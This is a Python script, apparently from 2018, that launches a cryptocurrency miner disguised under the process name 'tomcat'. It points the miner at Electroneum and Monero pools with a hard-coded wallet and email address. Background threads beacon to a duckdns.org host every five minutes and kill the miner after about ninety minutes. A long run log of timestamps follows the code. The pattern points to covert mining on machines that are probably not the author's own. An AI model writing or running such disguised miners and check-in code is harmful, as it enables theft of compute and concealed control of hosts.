import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:13:04.822154
#2018-02-17 17:01:03.947091
#2018-02-17 18:49:03.613037
#2018-02-17 20:36:03.366539
#2018-02-17 22:22:02.033113
#2018-02-18 00:05:08.718535
#2018-02-18 01:57:01.630413
#2018-02-18 03:44:07.062313
#2018-02-18 05:32:04.484903
#2018-02-18 07:24:01.609786
#2018-02-18 09:12:05.644318
#2018-02-18 10:58:04.520401
#2018-02-18 12:45:09.593893
#2018-02-18 14:31:01.455222
#2018-02-18 16:21:03.439975
#2018-02-18 18:10:05.423823
#2018-02-18 19:56:04.028964
#2018-02-18 21:44:04.684758
#2018-02-18 23:33:06.085262
#2018-02-19 01:19:04.996904
#2018-02-19 03:07:07.639946
#2018-02-19 04:53:01.695520
#2018-02-19 06:38:03.814299
#2018-02-19 08:27:07.549078
#2018-02-19 10:16:09.005832
#2018-02-19 12:03:04.441370
#2018-02-19 13:49:06.643899
#2018-02-19 15:37:05.726748
#2018-02-19 17:23:09.058766
#2018-02-19 19:11:09.575502
#2018-02-19 20:57:05.476414
#2018-02-19 22:45:01.714668
#2018-02-20 00:29:05.499772
#2018-02-20 02:17:04.655129
#2018-02-20 04:08:07.372975
#2018-02-20 05:51:01.744122
#2018-02-20 07:37:07.354010
#2018-02-20 09:21:05.896055
#2018-02-20 11:05:07.792896
#2018-02-20 12:52:01.722389
#2018-02-20 14:38:04.499625
#2018-02-20 16:23:04.018670
#2018-02-20 18:09:04.186596
#2018-02-20 19:59:08.738187
#2018-02-20 21:47:06.880481
#2018-02-20 23:27:07.837836
#2018-02-21 01:11:05.087348
#2018-02-21 02:58:04.982619
#2018-02-21 04:46:05.258373
#2018-02-21 06:33:06.327011
#2018-02-21 08:18:05.403977
#2018-02-21 10:04:04.195752
#2018-02-21 11:52:04.068996
#2018-02-21 13:42:08.663547
#2018-02-21 15:26:06.863750
#2018-02-21 17:16:05.330505
#2018-02-21 19:03:07.496415
#2018-02-21 20:51:05.693848
#2018-02-21 22:37:04.584507
#2018-02-22 00:26:01.954904
#2018-02-22 02:12:03.812979
#2018-02-22 03:57:07.928145
#2018-02-22 05:44:04.406945
#2018-02-22 07:28:07.863253
#2018-02-22 09:16:04.217169
#2018-02-22 11:03:02.191067
#2018-02-22 12:48:09.229271
#2018-02-22 14:33:01.760788
#2018-02-22 16:20:06.296599
#2018-02-22 18:08:09.043914
#2018-02-22 19:56:07.710479
#2018-02-22 21:45:09.247660
#2018-02-22 23:33:08.001248
#2018-02-23 01:21:02.030575
#2018-02-23 03:07:01.822915
#2018-02-23 04:53:06.026769
#2018-02-23 06:36:01.646810
#2018-02-23 08:24:01.804424
#2018-02-23 10:39:07.904083
#2018-02-23 12:33:02.031869
#2018-02-23 14:20:01.619271
#2018-02-23 16:10:10.377454
#2018-02-23 17:56:01.676413
#2018-02-23 19:41:01.791085
#2018-02-23 21:24:02.027928
#2018-02-23 23:12:01.752077
#2018-02-24 00:54:04.206038
#2018-02-24 02:49:06.145279
#2018-02-24 04:39:06.428909
#2018-02-24 06:23:04.451996
#2018-02-24 08:11:01.743362
#2018-02-24 09:55:07.286369
#2018-02-24 11:50:06.213221
#2018-02-24 13:41:06.475334
#2018-02-24 15:28:05.180395
#2018-02-24 17:18:05.967860
#2018-02-24 19:09:03.832493
#2018-02-24 20:57:07.423069
#2018-02-25 01:10:05.190207
#2018-02-25 04:52:01.532442
#2018-02-25 08:16:01.489313